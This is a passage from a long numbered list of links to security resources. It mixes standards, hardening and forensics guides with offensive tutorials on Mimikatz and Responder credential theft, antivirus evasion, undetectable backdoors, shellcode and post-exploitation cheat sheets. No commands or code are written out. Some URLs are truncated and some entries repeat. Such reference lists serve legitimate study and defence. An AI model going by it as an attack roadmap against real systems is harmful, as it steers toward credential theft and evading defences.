https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project -1330-CERT Secure Coding Standards: https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards -1331-NIST Special Publication 800-53: https://nvd.nist.gov/800-53 -1332-SAFECode Security White Papers: https://safecode.org/publications/ -1333-Microsoft Threat Modeling tool 2016: https://aka.ms/tmt2016/ -1334-Apache Metron for real-time big data security: http://metron.apache.org/documentation/ -1335-Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process: https://resources.sei.cmu.edu/asset_files/TechnicalReport/2007_005_001_14885.pdf -1336-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: http://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-18r1.pdf -1337-ITU-T X.805 (10/2003) Security architecture for systems providing end- to-end communications: https://www.itu.int/rec/dologin_pub.asp?lang=e&id=T-REC-X.805-200310-I!!PDF-E&type=items -1338-ETSI TS 102 165-1 V4.2.1 (2006-12) : Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.01_60/ts_10216501v040201p.pdf -1339-SAFECode Fundamental Practices for Secure Software Development: https://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf -1340-NIST 800-64 Security Considerations in the System Development Life Cycle: https://csrc.nist.gov/publications/detail/sp/800-64/rev-2/final -1341-SANS A Security Checklist for Web Application Design: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1342-Best Practices for implementing a Security Awareness Program: https://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf -1343-ETSI TS 102 165-1 V4.2.1 (2006-12): Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.03_60/ts_10216501v040203p.pdf -1344-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: https://csrc.nist.gov/publications/detail/sp/800-18/rev-1/final -1345-SafeCode Tactical Threat Modeling: https://safecode.org/safecodepublications/tactical-threat-modeling/ -1346-SANS Web Application Security Design Checklist: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1347-Data Anonymization for production data dumps: https://github.com/sunitparekh/data-anonymization -1348-SANS Continuous Monitoring—What It Is, Why It Is Needed, and How to Use It: https://www.sans.org/reading-room/whitepapers/analyst/continuous-monitoring-is-needed-35030 -1349-Guide to Computer Security Log Management: https://ws680.nist.gov/publication/get_pdf.cfm?pub_id=50881 -1350-Malware Indicators: https://github.com/citizenlab/malware-indicators -1351-OSINT Threat Feeds: https://www.circl.lu/doc/misp/feed-osint/ -1352-SANS How to Use Threat Intelligence effectively: https://www.sans.org/reading-room/whitepapers/analyst/threat-intelligence-is-effectively-37282 -1353-NIST 800-150 Guide to Cyber Threat Information Sharing: https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-150.pdf -1354-Securing Web Application Technologies Checklist: https://software-security.sans.org/resources/swat -1355-Firmware Security Training: https://github.com/advanced-threat-research/firmware-security-training -1356-Burp Suite Bootcamp: https://pastebin.com/5sG7Rpg5 -1357-Web app hacking: https://pastebin.com/ANsw7WRx -1358-XSS Payload: https://pastebin.com/EdxzE4P1 -1359-XSS Filter Evasion Cheat Sheet: https://pastebin.com/bUutGfSy -1360-Persistence using RunOnceEx – Hidden from Autoruns.exe: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -1361-Windows Operating System Archaeology: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology -1362-How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky: https://www.prodefence.org/how-to-backdoor-windows-10-using-an-android-phone-usb-rubber-ducky/ -1363-Malware Analysis using Osquery : https://hackernoon.com/malware-analysis-using-osquery-part-2-69f08ec2ecec -1364-Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals : https://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/ -1365-Userland registry hijacking: https://3gstudent.github.io/Userland-registry-hijacking/ -1366-Malware Hiding Techniques to Watch for: AlienVault Labs: https://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs -1367- Full text of "Google hacking for penetration testers" : https://archive.org/stream/pdfy-TPtNL6_ERVnbod0r/Google+Hacking+-+For+Penetration+Tester_djvu.txt -1368- Full text of "Long, Johnny Google Hacking For Penetration Testers" : https://archive.org/stream/LongJohnnyGoogleHackingForPenetrationTesters/Long%2C%20Johnny%20-%20Google%20Hacking%20for%20Penetration%20Testers_djvu.txt -1369- Full text of "Coding For Penetration Testers" : https://archive.org/stream/CodingForPenetrationTesters/Coding%20for%20Penetration%20Testers_djvu.txt -1370- Full text of "Hacking For Dummies" : https://archive.org/stream/HackingForDummies/Hacking%20For%20Dummies_djvu.txt -1371-Full text of "Wiley. Hacking. 5th. Edition. Jan. 2016. ISBN. 1119154685. Profescience.blogspot.com" : https://archive.org/stream/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com_djvu.txt -1372- Full text of "Social Engineering The Art Of Human Hacking" : https://archive.org/stream/SocialEngineeringTheArtOfHumanHacking/Social%20Engineering%20-%20The%20Art%20of%20Human%20Hacking_djvu.txt -1373- Full text of "CYBER WARFARE" : https://archive.org/stream/CYBERWARFARE/CYBER%20WARFARE_djvu.txt -1374-Full text of "NSA DOCID: 4046925 Untangling The Web: A Guide To Internet Research" : https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt -1375- Full text of "sectools" : https://archive.org/stream/sectools/hack-the-stack-network-security_djvu.txt -1376- Full text of "Aggressive network self-defense" : https://archive.org/stream/pdfy-YNtvDJueGZb1DCDA/Aggressive%20Network%20Self-Defense_djvu.txt -1377-Community Texts: https://archive.org/details/opensource?and%5B%5D=%28language%3Aeng+OR+language%3A%22English%22%29+AND+subject%3A%22google%22 -1378- Full text of "Cyber Spying - Tracking (sometimes).PDF (PDFy mirror)" : https://archive.org/stream/pdfy-5-Ln_yPZ22ondBJ8/Cyber%20Spying%20-%20Tracking%20%28sometimes%29_djvu.txt -1379- Full text of "Enzyclopedia Of Cybercrime" : https://archive.org/stream/EnzyclopediaOfCybercrime/Enzyclopedia%20Of%20Cybercrime_djvu.txt -1380- Full text of "Information Security Management Handbook" : https://archive.org/stream/InformationSecurityManagementHandbook/Information%20Security%20Management%20Handbook_djvu.txt -1381- Full text of "ARMArchitecture Reference Manual" : https://archive.org/stream/ARMArchitectureReferenceManual/DetectionOfIntrusionsAndMalwareAndVulnerabilityAssessment2016_djvu.txt -1382- Full text of "Metasploit The Penetration Tester S Guide" : https://archive.org/stream/MetasploitThePenetrationTesterSGuide/Metasploit-The+Penetration+Tester+s+Guide_djvu.txt -1383-Tips & tricks to master Google’s search engine: https://medium.com/infosec-adventures/google-hacking-39599373be7d -1384-Ethical Google Hacking - Sensitive Doc Dork (Part 2) : https://securing-the-stack.teachable.com/courses/ethical-google-hacking-1/lectures/3877866 -1385- Google Hacking Secrets:the Hidden Codes of Google : https://www.ma-no.org/en/security/google-hacking-secrets-the-hidden-codes-of-google -1386-google hacking: https://www.slideshare.net/SamNizam/3-google-hacking -1387-How Penetration Testers Use Google Hacking: https://www.cqure.nl/kennisplatform/how-penetration-testers-use-google-hacking -1388-Free Automated Malware Analysis Sandboxes and Services: https://zeltser.com/automated-malware-analysis/ -1389-How to get started with Malware Analysis and Reverse Engineering: https://0ffset.net/miscellaneous/how-to-get-started-with-malware-analysis/ -1390-Handy Tools And Websites For Malware Analysis: https://www.informationsecuritybuzz.com/articles/handy-tools-and-websites/ -1391-Dynamic Malware Analysis: prasannamundas.com/share/dynamic-malware-analysis/ -1392-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1393-Detecting malware through static and dynamic techniques: https://technical.nttsecurity.com/.../detecting-malware-through-static-and-dynamic-tec... -1394-Malware Analysis Tutorial : Tricks for Confusing Static Analysis Tools: https://www.prodefence.org/malware-analysis-tutorial-tricks-confusing-static-analysis-tools -1395-Malware Analysis Lab At Home In 5 Steps: https://ethicalhackingguru.com/malware-analysis-lab-at-home-in-5-steps/ -1396-Malware Forensics Guide - Static and Dynamic Approach: https://www.yeahhub.com/malware-forensics-guide-static-dynamic-approach/ -1397-Top 30 Bug Bounty Programs in 2019: https://www.guru99.com/bug-bounty-programs.html -1398-Introduction - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/ -1399-List of bug bounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1400-Tips From A Bugbounty Hunter: https://www.secjuice.com/bugbounty-hunter/ -1401-Cross Site Scripting (XSS) - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/cross-site-scripting-xss -1402-BugBountyTips: https://null0xp.wordpress.com/tag/bugbountytips/ -1403-Xss Filter Bypass Payloads: www.oroazteca.net/mq67/xss-filter-bypass-payloads.html -1404-Bug Bounty Methodology: https://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0 -1405-GDB cheat-sheet for exploit development: www.mannulinux.org/2017/01/gdb-cheat-sheet-for-exploit-development.html -1406-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1407-Exploit development tutorial : https://www.computerweekly.com/tutorial/Exploit-development-tutorial-Part-Deux -1408-exploit code development: http://www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf -1409-“Help Defeat Denial of Service Attacks: Step-by-Step”: http://www.sans.org/dosstep/ -1410-Internet Firewalls: Frequently Asked Questions: http://www.interhack.net/pubs/fwfaq/ -1411-Service Name and Transport Protocol Port Number: http://www.iana.org/assignments/port-numbers -1412-10 Useful Open Source Security Firewalls for Linux Systems: https://www.tecmint.com/open-source-security-firewalls-for-linux-systems/ -1413-40 Linux Server Hardening Security Tips: https://www.cyberciti.biz/tips/linux-security.html -1414-Linux hardening: A 15-step checklist for a secure Linux server : https://www.computerworld.com/.../linux-hardening-a-15-step-checklist-for-a-secure-linux-server -1415-25 Hardening Security Tips for Linux Servers: https://www.tecmint.com/linux-server-hardening-security-tips/ -1416-How to Harden Unix/Linux Systems & Close Security Gaps: https://www.beyondtrust.com/blog/entry/harden-unix-linux-systems-close-security-gaps -1417-34 Linux Server Security Tips & Checklists for Sysadmins: https://www.process.st/server-security/ -1418-Linux Hardening: https://www.slideshare.net/MichaelBoelen/linux-hardening -1419-23 Hardening Tips to Secure your Linux Server: https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/ -1420-What is the Windows Registry? : https://www.computerhope.com/jargon/r/registry.htm -1421-Windows Registry, Everything You Need To Know: https://www.gammadyne.com/registry.htm -1422-Windows Registry Tutorial: https://www.akadia.com/services/windows_registry_tutorial.html -1423-5 Tools to Scan a Linux Server for Malware and Rootkits: https://www.tecmint.com/scan-linux-for-malware-and-rootkits/ -1424-Subdomain takeover dew to missconfigured project settings for Custom domain .: https://medium.com/bugbountywriteup/subdomain-takeover-dew-to-missconfigured-project-settings-for-custom-domain-46e90e702969 -1425-Massive Subdomains p0wned: https://medium.com/bugbountywriteup/massive-subdomains-p0wned-80374648336e -1426-Subdomain Takeover: Basics: https://0xpatrik.com/subdomain-takeover-basics/ -1427-Subdomain Takeover: Finding Candidates: https://0xpatrik.com/subdomain-takeover-candidates/ -1428-Bugcrowd's Domain & Subdomain Takeover!: https://bugbountypoc.com/bugcrowds-domain-takeover/ -1429-What Are Subdomain Takeovers, How to Test and Avoid Them?: https://dzone.com/articles/what-are-subdomain-takeovers-how-to-test-and-avoid -1430-Finding Candidates for Subdomain Takeovers: https://jarv.is/notes/finding-candidates-subdomain-takeovers/ -1431-Subdomain takeover of blog.snapchat.com: https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7 -1432-Hostile Subdomain takeove: https://labs.detectify.com/tag/hostile-subdomain-takeover/ -1433-Microsoft Account Takeover Vulnerability Affecting 400 Million Users: https://www.safetydetective.com/blog/microsoft-outlook/ -1434-What is Subdomain Hijack/Takeover Vulnerability? How to Identify? & Exploit It?: https://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/ -1435-Subdomain takeover detection with AQUATONE: https://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/ -1436-A hostile subdomain takeover! – Breaking application security: https://evilenigma.blog/2019/03/12/a-hostile-subdomain-takeover/ -1437-Web Development Reading List: https://www.smashingmagazine.com/2017/03/web-development-reading-list-172/ -1438-CSRF Attack can lead to Stored XSS: https://medium.com/bugbountywriteup/csrf-attack-can-lead-to-stored-xss-f40ba91f1e4f -1439-What is Mimikatz: The Beginner's Guide | Varonis: https://www.varonis.com/bog/what-is-mimikatz -1440-Preventing Mimikatz Attacks : https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5 -1441-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/.../Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1442-Mimikatz: Walkthrough [Updated 2019]: https://resources.infosecinstitute.com/mimikatz-walkthrough/ -1443-Mimikatz -Windows Tutorial for Beginner: https://hacknpentest.com/mimikatz-windows-tutorial-beginners-guide-part-1/ -1444-Mitigations against Mimikatz Style Attacks: https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks -1445-Exploring Mimikatz - Part 1 : https://blog.xpnsec.com/exploring-mimikatz-part-1/ -1446-Powershell AV Evasion. Running Mimikatz with PowerLine: https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html -1447-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -1448-Retrieving NTLM Hashes without touching LSASS: https://www.andreafortuna.org/2018/03/26/retrieving-ntlm-hashes-without-touching-lsass-the-internal-monologue-attack/ -1449-From Responder to NT Authority\SYSTEM: https://medium.com/bugbountywriteup/from-responder-to-nt-authority-system-39abd3593319 -1450-Getting Creds via NTLMv2: https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html -1451-Living off the land: stealing NetNTLM hashes: https://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html -1452-(How To) Using Responder to capture passwords on a Windows: www.securityflux.com/?p=303 -1453-Pwning with Responder - A Pentester's Guide: https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/ -1454-LLMNR and NBT-NS Poisoning Using Responder: https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/ -1455-Responder - Ultimate Guide : https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/ -1456-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1457-LM, NTLM, Net-NTLMv2, oh my! : https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4 -1458-SMB Relay Attack Tutorial: https://intrinium.com/smb-relay-attack-tutorial -1459-Cracking NTLMv2 responses captured using responder: https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/ -1460-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -1461-Metasploit's First Antivirus Evasion Modules: https://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/ -1462-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -1463-Evading AV with Shellter: https://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/ -1464-Shellter-A Shellcode Injecting Tool : https://www.hackingarticles.in/shellter-a-shellcode-injecting-tool/ -1465-Bypassing antivirus programs using SHELLTER: https://myhackstuff.com/shellter-bypassing-antivirus-programs/ -1466-John the Ripper step-by-step tutorials for end-users : openwall.info/wiki/john/tutorials -1467-Beginners Guide for John the Ripper (Part 1): https://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -1468-John the Ripper Basics Tutorial: https://ultimatepeter.com/john-the-ripper-basics-tutorial/ -1469-Crack Windows password with john the ripper: https://www.securitynewspaper.com/2018/11/27/crack-windows-password-with-john-the-ripper/ -1470-Getting Started Cracking Password Hashes with John the Ripper : https://www.tunnelsup.com/getting-started-cracking-password-hashes/ -1471-Shell code exploit with Buffer overflow: https://medium.com/@jain.sm/shell-code-exploit-with-buffer-overflow-8d78cc11f89b -1472-Shellcoding for Linux and Windows Tutorial : www.vividmachines.com/shellcode/shellcode.html -1473-Buffer Overflow Practical Examples : https://0xrick.github.io/binary-exploitation/bof5/ -1474-Msfvenom shellcode analysis: https://snowscan.io/msfvenom-shellcode-analysis/ -1475-Process Continuation Shellcode: https://azeria-labs.com/process-continuation-shellcode/ -1476-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution/ -1477-Tutorials: Writing shellcode to binary files: https://www.fuzzysecurity.com/tutorials/7.html -1478-Creating Shellcode for an Egg Hunter : https://securitychops.com/2018/05/26/slae-assignment-3-egghunter-shellcode.html -1479-How to: Shellcode to reverse bind a shell with netcat : www.hackerfall.com/story/shellcode-to-reverse-bind-a-shell-with-netcat -1480-Bashing the Bash — Replacing Shell Scripts with Python: https://medium.com/capital-one-tech/bashing-the-bash-replacing-shell-scripts-with-python-d8d201bc0989 -1481-How to See All Devices on Your Network With nmap on Linux: https://www.howtogeek.com/.../how-to-see-all-devices-on-your-network-with-nmap-on-linux -1482-A Complete Guide to Nmap: https://www.edureka.co/blog/nmap-tutorial/ -1483-Nmap from Beginner to Advanced : https://resources.infosecinstitute.com/nmap/ -1484-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1485-tshark tutorial and filter examples: https://hackertarget.com/tshark-tutorial-and-filter-examples/ -1486-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing.html -1487-Tutorial: Dumb Fuzzing - Peach Community Edition: community.peachfuzzer.com/v3/TutorialDumbFuzzing.html -1488-HowTo: ExploitDev Fuzzing: https://hansesecure.de/2018/03/howto-exploitdev-fuzzing/ -1489-Fuzzing with Metasploit: https://www.corelan.be/?s=fuzzing -1490-Fuzzing – how to find bugs automagically using AFL: 9livesdata.com/fuzzing-how-to-find-bugs-automagically-using-afl/ -1491-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1492-0x3 Python Tutorial: Fuzzer: https://www.primalsecurity.net/0x3-python-tutorial-fuzzer/ -1493-Hunting For Bugs With AFL: https://research.aurainfosec.io/hunting-for-bugs-101/ -1494-Fuzzing: The New Unit Testing: https://www.slideshare.net/DmitryVyukov/fuzzing-the-new-unit-testing -1495-Fuzzing With Peach Framework: https://www.terminatio.org/fuzzing-peach-framework-full-tutorial-download/ -1496-How we found a tcpdump vulnerability using cloud fuzzing: https://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/ -1497-Finding a Fuzzer: Peach Fuzzer vs. Sulley: https://medium.com/@jtpereyda/finding-a-fuzzer-peach-fuzzer-vs-sulley-1fcd6baebfd4 -1498-Android malware analysis: https://www.slideshare.net/rossja/android-malware-analysis-71109948 -1499-15+ Malware Analysis Tools & Techniques : https://www.template.net/business/tools/malware-analysis/ -1500-30 Online Malware Analysis Sandboxes / Static Analyzers: https://medium.com/@su13ym4n/15-online-sandboxes-for-malware-analysis-f8885ecb8a35 -1501-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -1502-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -1503-Breach detection with Linux filesystem forensics: https://opensource.com/article/18/4/linux-filesystem-forensics -1504-Digital Forensics Cheat Sheets Collection : https://neverendingsecurity.wordpress.com/digital-forensics-cheat-sheets-collection/ -1505-Security Incident Survey Cheat Sheet for Server Administrators: https://zeltser.com/security-incident-survey-cheat-sheet/ -1506-Digital forensics: A cheat sheet : https://www.techrepublic.com/article/digital-forensics-the-smart-persons-guide/ -1507-Windows Registry Forensics using 'RegRipper' Command-Line on Linux: https://www.pinterest.cl/pin/794815034207804059/ -1508-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/koriley/cheat-sheets/windows-ir-live-forensics/ -1509-10 Best Known Forensics Tools That Works on Linux: https://linoxide.com/linux-how-to/forensics-tools-linux/ -1510-Top 20 Free Digital Forensic Investigation Tools for SysAdmins: https://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/ -1511-Windows Volatile Memory Acquisition & Forensics 2018: https://medium.com/@lucideus/windows-volatile-memory-acquisition-forensics-2018-lucideus-forensics-3f297d0e5bfd -1512-PowerShell Cheat Sheet : https://www.digitalforensics.com/blog/powershell-cheat-sheet-2/ -1513-Forensic Artifacts: evidences of program execution on Windows systems: https://www.andreafortuna.org/forensic-artifacts-evidences-of-program-execution-on-windows-systems -1514-How to install a CPU?: https://www.computer-hardware-explained.com/how-to-install-a-cpu.html -1515-How To Upgrade and Install a New CPU or Motherboard: https://www.howtogeek.com/.../how-to-upgrade-and-install-a-new-cpu-or-motherboard-or-both -1516-Installing and Troubleshooting CPUs: www.pearsonitcertification.com/articles/article.aspx?p=1681054&seqNum=2 -1517-15 FREE Pastebin Alternatives You Can Use Right Away: https://www.rootreport.com/pastebin-alternatives/ -1518-Basic computer troubleshooting steps: https://www.computerhope.com/basic.htm -1519-18 Best Websites to Learn Computer Troubleshooting and Tech support: http://transcosmos.co.uk/best-websites-to-learn-computer-troubleshooting-and-tech-support -1520-Post Exploitation with PowerShell Empire 2.3.0 : https://www.yeahhub.com/post-exploitation-powershell-empire-2-3-0-detailed-tutorial/ -1521-Windows Persistence with PowerShell Empire : https://www.hackingarticles.in/windows-persistence-with-powershell-empire/ -1522-powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial: https://www.dudeworks.com/powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial -1523-Bypassing Anti-Virtus & Hacking Windows 10 Using Empire : https://zsecurity.org/bypassing-anti-virtus-hacking-windows-10-using-empire/ -1524-Hacking with Empire – PowerShell Post-Exploitation Agent : https://www.prodefence.org/hacking-with-empire-powershell-post-exploitation-agent/ -1525-Hacking Windows Active Directory Full guide: www.kalitut.com/hacking-windows-active-directory-full.html -1526-PowerShell Empire for Post-Exploitation: https://www.hackingloops.com/powershell-empire/ -1527-Generate A One-Liner – Welcome To LinuxPhilosophy!: linuxphilosophy.com/rtfm/more/empire/generate-a-one-liner/ -1528-CrackMapExec - Ultimate Guide: https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/ -1529-PowerShell Logging and Security: https://www.secjuice.com/enterprise-powershell-protection-logging/ -1530-Create your own FUD Backdoors with Empire: http://blog.extremehacking.org/blog/2016/08/25/create-fud-backdoors-empire/ -1531-PowerShell Empire Complete Tutorial For Beginners: https://video.hacking.reviews/2019/06/powershell-empire-complete-tutorial-for.html -1532-Bash Bunny: Windows Remote Shell using Metasploit & PowerShell: https://cyberarms.wordpress.com/.../bash-bunny-windows-remote-shell-using-metasploit-powershell -1533-Kerberoasting - Stealing Service Account Credentials: https://www.scip.ch/en/?labs.20181011 -1534-Automating Mimikatz with Empire and DeathStar : https://blog.stealthbits.com/automating-mimikatz-with-empire-and-deathstar/ -1535-Windows oneliners to get shell : https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -1536-ObfuscatedEmpire : https://cobbr.io/ObfuscatedEmpire.html -1537-Pentesting with PowerShell in six steps: https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/ -1538-Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM): https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm -1539-PowerShell Security Best Practices: https://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/ -1540-You can detect PowerShell attacks: https://www.slideshare.net/Hackerhurricane/you-can-detect-powershell-attacks -1541-Detecting and Preventing PowerShell Attacks: https://www.eventsentry.com/.../powershell-pw3rh311-detecting-preventing-powershell-attacks -1542-Detecting Offensive PowerShell Attack Tools – Active Directory Security: https://adsecurity.org/?p=2604 -1543-An Internal Pentest Audit Against Active Directory: https://www.exploit-db.com/docs/46019 -1544-A complete Active Directory Penetration Testing Checklist : https://gbhackers.com/active-directory-penetration-testing-checklist/ -1545-Active Directory | Penetration Testing Lab: https://pentestlab.blog/tag/active-directory/ -1546-Building and Attacking an Active Directory lab with PowerShell : https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell -1547-Penetration Testing in Windows Server Active Directory using Metasploit: https://www.hackingarticles.in/penetration-testing-windows-server-active-directory-using-metasploit-part-1 -1548-Red Team Penetration Testing – Going All the Way (Part 2 of 3) : https://www.anitian.com/red-team-testing-going-all-the-way-part2/ -1549-Penetration Testing Active Directory, Part II: https://www.jishuwen.com/d/2Mtq -1550-Gaining Domain Admin from Outside Active Directory: https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html -1551-Post Exploitation Cheat Sheet: https://0xsecurity.com/blog/some-hacking-techniques/post-exploitation-cheat-sheet -1552-Windows post-exploitation : https://github.com/emilyanncr/Windows-Post-Exploitation -1553-OSCP - Windows Post Exploitation : https://hackingandsecurity.blogspot.com/2017/9/oscp-windows-post-exploitation.html -1554-Windows Post-Exploitation Command List: http://pentest.tonyng.net/windows-post-exploitation-command-list/ -1555-Windows Post-Exploitation Command List: http://tim3warri0r.blogspot.com/2012/09/windows-post-exploitation-command-list.html -1556-Linux Post-Exploitation · OSCP - Useful Resources: https://backdoorshell.gitbooks.io/oscp-useful-links/content/linux-post-exploitation.html -1557-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -1558-Pentesting Cheatsheets - Red Teaming Experiments: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -1559-OSCP Goldmine: http://0xc0ffee.io/blog/OSCP-Goldmine -1560-Linux Post Exploitation Cheat Sheet: http://red-orbita.com/?p=8455 -1562-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1563-Windows Post-Exploitation Command List : https://es.scribd.com/document/100182787/Windows-Post-Exploitation-Command-List -1564-Metasploit Cheat Sheet: https://pentesttools.net/metasploit-cheat-sheet/ -1565-Windows Privilege Escalation: https://awansec.com/windows-priv-esc.html -1566-Linux Unix Bsd Post Exploitation: https://attackerkb.com/Unix/LinuxUnixBSD_Post_Exploitation -1567-Privilege Escalation & Post-Exploitation: https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/ -1568-Metasploit Cheat Sheet: https://vk-intel.org/2016/12/28/metasploit-cheat-sheet/ -1569-Metasploit Cheat Sheet : https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1570-Privilege escalation: Linux: https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1571-Cheat Sheets — Amethyst Security: https://www.ssddcyber.com/cheatsheets -1572-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1573-Cheatsheets: https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt -1574-Are you ready for OSCP?: https://www.hacktoday.io/t/are-you-ready-for-oscp/59 -1575-Windows Privilege Escalation: https://labs.p64cyber.com/windows-privilege-escalation/ -1576-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1577-Windows Post-Exploitation-Cheat-Sheet: http://pentestpanther.com/2019/07/01/windows-post-exploitation-cheat-sheet/ -1578-Windows Privilege Escalation (privesc) Resources: https://www.willchatham.com/security/windows-privilege-escalation-privesc-resources/ -1579-Dissecting Mobile Malware: https://slideplayer.com/slide/3434519/ -1580-Android malware analysis with Radare: Dissecting the Triada Trojan: www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triad/ -1581-Dissecting Mobile Native Code Packers: https://blog.zimperium.com/dissecting-mobile-native-code-packers-case-study/ -1582-What is Mobile Malware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/mobile-malware -1583-Malware Development — Professionalization of an Ancient Art: https://medium.com/scip/malware-development-professionalization-of-an-ancient-art-4dfb3f10f34b -1584-Weaponizing Malware Code Sharing with Cythereal MAGIC: https://medium.com/@arun_73782/cythereal-magic-e68b0c943b1d -1585-Web App Pentest Cheat Sheet: https://medium.com/@muratkaraoz/web-app-pentest-cheat-sheet-c17394af773 -1586-The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued: https://medium.com/@jeremy.trinka/the-usb-threat-is-still-real-pentest-tools-for-sysadmins-continued-88560af447bf -1587-How to Run An External Pentest: https://medium.com/@_jayhill/how-to-run-an-external-pentest-dd76ed14bb6a -1588-Advice for new pentesters: https://medium.com/@PentesterLab/advice-for-new-pentesters-a5f7d75a3aea -1589-NodeJS Application Pentest Tips: https://medium.com/bugbountywriteup/nodejs-application-pentest-tips-improper-uri-handling-in-express-390b3a07cb3e -1590-How to combine Pentesting with Automation to improve your security: https://medium.com/how-to-combine-pentest-with-automation-to-improve-your-security -1591-Day 79: FTP Pentest Guide: https://medium.com/@int0x33/day-79-ftp-pentest-guide-5106967bd50a -1592-SigintOS: A Wireless Pentest Distro Review: https://medium.com/@tomac/sigintos-a-wireless-pentest-distro-review-a7ea93ee8f8b 